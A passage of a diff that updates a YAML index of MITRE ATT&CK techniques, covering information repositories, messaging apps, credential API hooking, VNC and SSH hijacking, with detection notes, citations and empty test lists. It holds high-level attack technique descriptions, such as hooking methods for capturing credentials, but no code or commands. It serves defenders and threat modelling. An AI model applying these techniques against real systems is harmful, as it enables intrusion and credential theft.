         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -42374,10 +42982,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -42390,10 +42997,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -42402,11 +43019,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -42443,7 +43063,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -42475,115 +43095,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -42594,6 +43281,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -42603,7 +43291,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -42619,66 +43306,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -42703,11 +43391,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -42730,9 +43418,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -42783,7 +43470,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -42847,7 +43533,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -42918,7 +43603,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -42955,7 +43639,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
